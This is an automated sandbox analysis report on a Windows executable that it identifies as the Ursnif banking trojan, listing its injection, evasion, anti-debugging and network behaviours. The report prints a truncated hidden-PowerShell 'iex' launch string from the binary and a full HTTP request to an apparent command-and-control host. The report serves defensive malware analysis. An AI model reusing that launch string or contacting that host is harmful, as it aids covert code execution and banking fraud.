Analysis Report zbetcheckin_tracker_propan.exe

Overview

General Information

Joe Sandbox Version:23.0.0
Analysis ID:48850
Start date:03.10.2018
Start time:11:14:04
Joe Sandbox Product:Cloud
Overall analysis duration:0h 3m 39s
Hypervisor based Inspection enabled:true
Report type:full
Sample file name:zbetcheckin_tracker_propan.exe
Cookbook file name:default.jbs
Analysis system description:Windows 7 x64 HVM (Office 2010, IE11, FF 50.1, Chrome 54.0, Java 1.8.0_111, Adobe Reader DC 2015.02)
Number of analysed new started processes analysed:6
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies
  • HCA enabled
  • EGA enabled
  • HDC enabled
Analysis stop reason:Timeout
Detection:MAL
Classification:mal80.bank.evad.winEXE@4/6@1/2
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 49.9% (good quality ratio 45.9%)
  • Quality average: 79.1%
  • Quality standard deviation: 31.4%
HCA Information:
  • Successful, ratio: 99%
  • Number of executed functions: 82
  • Number of non-executed functions: 77
Cookbook Comments:
  • Adjust boot time
  • Found application associated with file extension: .exe
Warnings:
  • Exclude process from analysis (whitelisted): dllhost.exe, WmiPrvSE.exe
  • Report size getting too big, too many NtDeviceIoControlFile calls found.

Detection

Strategy:Threshold
Score:80
Range:0 - 100
Detection:malicious

Confidence

Strategy:Threshold
Score:5
Range:0 - 5
Further Analysis Required?:false


Classification

Signature Overview


AV Detection:

Multi AV Scanner detection for submitted fileShow sources
Source: zbetcheckin_tracker_propan.exevirustotal: Detection: 44%Perma Link
Antivirus detection for unpacked fileShow sources
Source: 1.2.zbetcheckin_tracker_propan.exe.2a0000.1.unpackAvira: Label: TR/Patched.Ren.Gen
Source: 1.2.zbetcheckin_tracker_propan.exe.280000.0.unpackAvira: Label: TR/Patched.Ren.Gen

Networking:

Creates a COM Internet Explorer objectShow sources
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeKey opened: HKEY_CURRENT_USER_CLASSES\Wow6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}Jump to behavior
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}Jump to behavior
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeKey opened: HKEY_CURRENT_USER_Classes\Wow6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAsJump to behavior
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAsJump to behavior
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeKey opened: HKEY_CURRENT_USER_Classes\Wow6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\ProgidJump to behavior
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\ProgidJump to behavior
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeKey opened: HKEY_CURRENT_USER_Classes\Wow6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\ProgIDJump to behavior
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeKey opened: HKEY_CURRENT_USER_Classes\Wow6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\ProgidJump to behavior
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\ProgidJump to behavior
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeKey opened: HKEY_CURRENT_USER_Classes\Wow6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\ProgIDJump to behavior
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeKey opened: HKEY_CURRENT_USER_Classes\Wow6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}Jump to behavior
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeKey opened: HKEY_CURRENT_USER_Classes\Wow6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}Jump to behavior
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeKey opened: HKEY_CURRENT_USER_Classes\Wow6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32Jump to behavior
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32Jump to behavior
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeKey opened: HKEY_CURRENT_USER_Classes\Wow6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32Jump to behavior
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32Jump to behavior
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeKey opened: HKEY_CURRENT_USER_Classes\Wow6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandlerJump to behavior
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandlerJump to behavior
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCOM instance created: 0002DF01-0000-0000-C000-000000000046Jump to behavior
Downloads filesShow sources
Source: C:\Program Files\Internet Explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\FF8G8DG0Jump to behavior
Downloads files from webservers via HTTPShow sources
Source: global trafficHTTP traffic detected: GET /wpapi/XlhPkWURsPeX9n/KdgCvOhJyTpK7WR6Gbx1E/EGIHNIQTXREQOMps/rPc05MTJOZBIhXE/5m9k63AYGwTnA9kVzH/_2BvJ_2Bu/qT25s_2Bd32_2FwmnoO7/VJJFaK5GX9ndvILO9eE/_2BmLslnLM1_2Bzpzpe8w6/7wEfNRxzT1pne/O97RG4NY/OoJbmGnwE2owDOmHjuVKPJu/as3X3i37Pg/GbArsAQV3tEr4y9/hOi HTTP/1.1Accept: text/html, application/xhtml+xml, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: doc.rendes.atConnection: Keep-Alive
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: doc.rendes.at

E-Banking Fraud:

Detected Ursnif banking trojanShow sources
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_2_00401C7A1_2_00401C7A

System Summary:

Contains functionality to create processes via WMIShow sources
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: %systemroot%\system32\wbem\wmic.exe /output:clipboard process call create "powershell -w hidden iex([System.Text.Encoding]::ASCII.1_2_002D42BD
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: %systemroot%\system32\wbem\wmic.exe /output:clipboard process call create "powershell -w hidden iex([System.Text.Encoding]::ASCII.1_2_002D42BD
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: %systemroot%\system32\wbem\wmic.exe /output:clipboard process call create "powershell -w hidden iex([System.Text.Encoding]::ASCII.1_2_002D42BD
Source: zbetcheckin_tracker_propan.exeBinary or memory string: %systemroot%\system32\wbem\wmic.exe /output:clipboard process call create "powershell -w hidden iex([System.Text.Encoding]::ASCII.
Starts Internet Explorer in hidden modeShow sources
Source: C:\Program Files\Internet Explorer\iexplore.exeWindow hidden: window name: IEFrameJump to behavior
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)Show sources
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeMemory allocated: 76BA0000 page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeMemory allocated: 76AA0000 page execute and read and writeJump to behavior
Contains functionality to call native functionsShow sources
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_2_004022EC memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,1_2_004022EC
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_2_004018F0 NtMapViewOfSection,RtlNtStatusToDosError,1_2_004018F0
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_2_004012F6 LdrLoadDll,LdrGetProcedureAddress,NtProtectVirtualMemory,GetModuleHandleA,memcpy,1_2_004012F6
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_2_004027FD GetModuleHandleA,GetCursorPos,GetModuleHandleA,GetModuleHandleA,NtGetContextThread,NtGetContextThread,1_2_004027FD
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_2_0040192F NtCreateSection,memset,RtlNtStatusToDosError,ZwClose,1_2_0040192F
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_2_0040143E memcpy,memcpy,memcpy,NtUnmapViewOfSection,RtlNtStatusToDosError,CloseHandle,memset,1_2_0040143E
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_2_00402749 NtGetContextThread,RtlNtStatusToDosError,1_2_00402749
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_2_0040276A NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,1_2_0040276A
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_2_0040318D NtQueryVirtualMemory,1_2_0040318D
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_2_00402F20 NtGetContextThread,1_2_00402F20
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_2_004027AD NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,1_2_004027AD
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_2_002D4615 NtOpenProcess,NtOpenProcessToken,memcpy,NtClose,NtClose,1_2_002D4615
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_2_002DE040 LdrLoadDll,LdrGetProcedureAddress,NtProtectVirtualMemory,NtProtectVirtualMemory,1_2_002DE040
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_2_002DE297 NtMapViewOfSection,RtlNtStatusToDosError,1_2_002DE297
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_2_002DE2D6 NtCreateSection,RtlNtStatusToDosError,NtClose,1_2_002DE2D6
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_1_00401800 NtMapViewOfSection,1_1_00401800
Detected potential crypto functionShow sources
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_2_00402F6C1_2_00402F6C
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_2_002D92AC1_2_002D92AC
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_2_002D2BC61_2_002D2BC6
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_2_004144491_2_00414449
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_2_004160BE1_2_004160BE
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_2_00413F071_2_00413F07
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_2_0040E71E1_2_0040E71E
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_2_0041498B1_2_0041498B
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_1_004144491_1_00414449
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_1_00404A601_1_00404A60
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_1_0040D4F01_1_0040D4F0
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_1_004160BE1_1_004160BE
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_1_00413F071_1_00413F07
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_1_0040E71E1_1_0040E71E
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_1_0041498B1_1_0041498B
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_1_004151B91_1_004151B9
Found potential URLs in runtime VBA stringsShow sources
Source: C:\Program Files\Internet Explorer\iexplore.exeVBA Memory String: http://api.bing.com/qsml.aspx?query={searchTerms}&maxwidth={ie:maxWidth}&rowheight={ie:rowHeight}&sectionHeight={ie:sectionHeight}&FORM=IE11SS&market={language}Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeVBA Memory String: http://doc.rendes.at/wpapi/XlhPkWURsPeX9n/KdgCvOhJyTpK7WR6Gbx1E/EGIHNIQTXREQOMps/rPc05MTJOZBIhXE/5m9k63AYGwTnA9kVzH/_2BvJ_2Bu/qT25s_2Bd32_2FwmnoO7/VJJFaK5GX9ndvILO9eE/_2BmLslnLM1_2Bzpzpe8w6/7wEfNRxzT1pne/O97RG4NY/OoJbmGnwE2owDOmHjuVKPJu/as3X3i37Pg/GbArsAQJump to behavior
Source: C:\Program Files\Internet Explorer\iexplore.exeVBA Memory String: http://www.bing.com/favicon.icoJump to behavior
Source: C:\Program Files\Internet Explorer\iexplore.exeVBA Memory String: http://www.bing.com/search?q={searchTerms}&FORM=IE8SRCJump to behavior
Source: C:\Program Files\Internet Explorer\iexplore.exeVBA Memory String: http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IE11SRJump to behavior
Source: C:\Program Files\Internet Explorer\iexplore.exeVBA Memory String: http://www.bing.com/search?q={searchTerms}&src=IE-TopResult&FORM=IE11TRJump to behavior
PE file contains strange resourcesShow sources
Source: zbetcheckin_tracker_propan.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: zbetcheckin_tracker_propan.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Classification labelShow sources
Source: classification engineClassification label: mal80.bank.evad.winEXE@4/6@1/2
Contains functionality to instantiate COM classesShow sources
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_2_002D5457 CoCreateInstance,1_2_002D5457
Creates files inside the user directoryShow sources
Source: C:\Program Files\Internet Explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{F5B32550-C6EC-11E8-A1F8-44AC2DAE138A}.datJump to behavior
Creates temporary filesShow sources
Source: C:\Program Files\Internet Explorer\iexplore.exeFile created: C:\Users\user~1\AppData\Local\Temp\~DFB2457FAD379B77E9.TMPJump to behavior
PE file has an executable .text section and no other executable sectionShow sources
Source: zbetcheckin_tracker_propan.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Reads ini filesShow sources
Source: C:\Program Files\Internet Explorer\iexplore.exeFile read: C:\Users\desktop.iniJump to behavior
Reads software policiesShow sources
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Sample is known by AntivirusShow sources
Source: zbetcheckin_tracker_propan.exevirustotal: Detection: 44%
Spawns processesShow sources
Source: unknownProcess created: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exe 'C:\Users\user\Desktop\zbetcheckin_tracker_propan.exe'
Source: unknownProcess created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2296 CREDAT:275457 /prefetch:2
Source: C:\Program Files\Internet Explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2296 CREDAT:275457 /prefetch:2Jump to behavior
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior

Data Obfuscation:

Contains functionality to dynamically determine API callsShow sources
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_1_00412282 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_1_00412282
Uses code obfuscation techniques (call, push, ret)Show sources
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_2_00402F5B push ecx; ret 1_2_00402F6B
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_2_00407210 push ebp; ret 1_2_00407222
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_2_002D929B push ecx; ret 1_2_002D92AB
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_1_0040D4D1 push ecx; ret 1_1_0040D4E4

Hooking and other Techniques for Hiding and Protection:

Writes registry values via WMIShow sources
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeWMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetDWORDValue
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeWMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeWMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetDWORDValue
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeWMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeWMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetStringValue
Disables application error messages (SetErrorMode)
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion:

Found evasive API chain (may stop execution after checking locale)Show sources
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeEvasive API call chain: GetLocaleInfo, StrStr, ExitProcessgraph_1-7457
Tries to detect sandboxes / dynamic malware analysis system (cursor check)Show sources
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_2_004010ED1_2_004010ED
May sleep (evasive loops) to hinder dynamic analysisShow sources
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exe TID: 1376Thread sleep count: 117 > 30Jump to behavior
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exe TID: 1376Thread sleep time: -7020000s >= -60000sJump to behavior
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exe TID: 2096Thread sleep time: -60000s >= -60000sJump to behavior
Sample execution stops while process was sleeping (likely an evasion)Show sources
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeLast function: Thread delayed
Program exit pointsShow sources
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeAPI call chain: ExitProcess graph end nodegraph_1-7347

Anti Debugging:

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))Show sources
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeSystem information queried: KernelDebuggerInformationJump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)Show sources
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_2_004012F6 LdrLoadDll,LdrGetProcedureAddress,NtProtectVirtualMemory,GetModuleHandleA,memcpy,1_2_004012F6
Contains functionality to check if a debugger is running (IsDebuggerPresent)Show sources
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_2_0040FE9A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_0040FE9A
Contains functionality to dynamically determine API callsShow sources
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_1_00412282 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_1_00412282
Contains functionality to read the PEBShow sources
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_2_0025052B mov ebx, dword ptr fs:[00000030h]1_2_0025052B
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_2_00250000 mov eax, dword ptr fs:[00000030h]1_2_00250000
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_2_00250000 mov ebx, dword ptr fs:[00000030h]1_2_00250000
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_2_002506F5 mov eax, dword ptr fs:[00000030h]1_2_002506F5
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_2_002506F5 mov ecx, dword ptr fs:[00000030h]1_2_002506F5
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_2_00250AFD mov eax, dword ptr fs:[00000030h]1_2_00250AFD
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_2_00290000 mov eax, dword ptr fs:[00000030h]1_2_00290000
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_2_00290000 mov ecx, dword ptr fs:[00000030h]1_2_00290000
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_2_00290408 mov eax, dword ptr fs:[00000030h]1_2_00290408
Contains functionality which may be used to detect a debugger (GetProcessHeap)Show sources
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_1_0040C832 GetStartupInfoA,GetProcessHeap,GetProcessHeap,HeapAlloc,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetCommandLineA,1_1_0040C832
Contains functionality to register its own exception handlerShow sources
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_2_0040FE9A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_0040FE9A
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_2_00413BEE SetUnhandledExceptionFilter,UnhandledExceptionFilter,RtlUnwind,1_2_00413BEE
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_1_0040CA26 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_1_0040CA26
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_1_0040FE9A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_1_0040FE9A
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_1_00413BEE SetUnhandledExceptionFilter,UnhandledExceptionFilter,RtlUnwind,1_1_00413BEE

HIPS / PFW / Operating System Protection Evasion:

May try to detect the Windows Explorer process (often used for injection)Show sources
Source: zbetcheckin_tracker_propan.exe, 00000001.00000002.3011712104.0000000000880000.00000002.sdmpBinary or memory string: Program Manager
Source: zbetcheckin_tracker_propan.exe, 00000001.00000002.3011712104.0000000000880000.00000002.sdmpBinary or memory string: Shell_TrayWnd
Source: zbetcheckin_tracker_propan.exe, 00000001.00000002.3011712104.0000000000880000.00000002.sdmpBinary or memory string: !Progman

Language, Device and Operating System Detection:

Contains functionality locales information (e.g. system language)Show sources
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,1_2_0040270C
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: GetLocaleInfoA,1_2_004134B0
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: GetLocaleInfoA,GetModuleHandleA,GetModuleHandleA,1_1_004026F0
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: GetLocaleInfoA,1_1_004134B0
Contains functionality to query CPU information (cpuid)Show sources
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_2_002D46DF cpuid 1_2_002D46DF
Contains functionality to query local / system timeShow sources
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_2_002D1C3C GetSystemTimeAsFileTime,HeapFree,1_2_002D1C3C
Contains functionality to query the account / user nameShow sources
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_2_002D46DF GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,1_2_002D46DF
Contains functionality to query windows versionShow sources
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_2_00401B9B CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,1_2_00401B9B
Queries the cryptographic machine GUIDShow sources
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Behavior Graph

[Behavior graph (image not preserved). Behavior Graph ID: 48850, Sample: zbetcheckin_tracker_propan.exe, Startdate: 03/10/2018, Architecture: WINDOWS, Score: 80]

Simulations

Behavior and APIs

Time:11:16:06
Type:API Interceptor
Description:149x Sleep call for process: zbetcheckin_tracker_propan.exe modified

Antivirus Detection

Initial Sample

Source:zbetcheckin_tracker_propan.exe
Detection:44%
Scanner:virustotal

Source:zbetcheckin_tracker_propan.exe
Detection:11%
Scanner:metadefender

Dropped Files

No Antivirus matches

Unpacked PE Files

Source:1.2.zbetcheckin_tracker_propan.exe.2a0000.1.unpack
Detection:100%
Scanner:Avira
Label:TR/Patched.Ren.Gen

Source:1.2.zbetcheckin_tracker_propan.exe.280000.0.unpack
Detection:100%
Scanner:Avira
Label:TR/Patched.Ren.Gen

Domains

No Antivirus matches

URLs

No Antivirus matches

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Unpacked PEs

No yara matches

Startup

  • System is w7x64_hvm
  • iexplore.exe (PID: 2296 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 446332D1A5576870E436B13AEB27CA8E)
    • iexplore.exe (PID: 2776 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2296 CREDAT:275457 /prefetch:2 MD5: F2831268EC600225F611DC02166EACF0)
  • cleanup

Created / dropped Files

C:\Users\user~1\AppData\Local\Temp\~DF3B5F1BE92103196B.TMP
Process:C:\Program Files\Internet Explorer\iexplore.exe
File Type:FoxPro FPT, blocks size 258, next free block index 16711424
Size (bytes):25657
Entropy (8bit):2.176978949251122
Encrypted:false
MD5:55485BE3EF18BA5AD6355F9FBE25F3CC
SHA1:ABFF4536A8CA1C8C3066997982F831EF6C581715
SHA-256:983908AB258F0BA6C99BAF97CF34434D7704BB32E8824690C998A681E9EB2D78
SHA-512:9A9DBE0C22478908E5A6E1D230BF577625A6CC99D0F3CDC6135488D5CD8287C0910331BAC430AA30A1C2A62BE47D7B28396EE3F137AC0CC46214826342927BDC
Malicious:false
Reputation:low
C:\Users\user~1\AppData\Local\Temp\~DFB2457FAD379B77E9.TMP
Process:C:\Program Files\Internet Explorer\iexplore.exe
File Type:FoxPro FPT, blocks size 258, next free block index 16711424
Size (bytes):12917
Entropy (8bit):1.26396999706028
Encrypted:false
MD5:8A18599411937FBE9F25B7F5365779FE
SHA1:4356788CAEB2FCB84DE904A7B168D7F696E45E17
SHA-256:1F5940FFAD29BFDBFDD1726D070CAE1F6D8A5678EA0265E793DD5106B80F9F99
SHA-512:268C6AD044318D14509FF2C6BD015A9A4F8ACA9946EDBB8F2323599A9CF0F253477D054838167AF8C6DA393339581B7ED53B32964C413953DF4F7581A489C066
Malicious:false
Reputation:low
C:\Users\user\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
Process:C:\Program Files\Internet Explorer\iexplore.exe
File Type:PNG image data, 16 x 16, 4-bit colormap, non-interlaced
Size (bytes):237
Entropy (8bit):6.1480026084285395
Encrypted:false
MD5:9FB559A691078558E77D6848202F6541
SHA1:EA13848D33C2C7F4F4BAA39348AEB1DBFAD3DF31
SHA-256:6D8A01DC7647BC218D003B58FE04049E24A9359900B7E0CEBAE76EDF85B8B914
SHA-512:0E08938568CD123BE8A20B87D9A3AAF5CB05249DE7F8286FF99D3FA35FC7AF7A9D9797DD6EFB6D1E722147DCFB74437DE520395234D0009D452FB96A8ECE236B
Malicious:false
Reputation:low
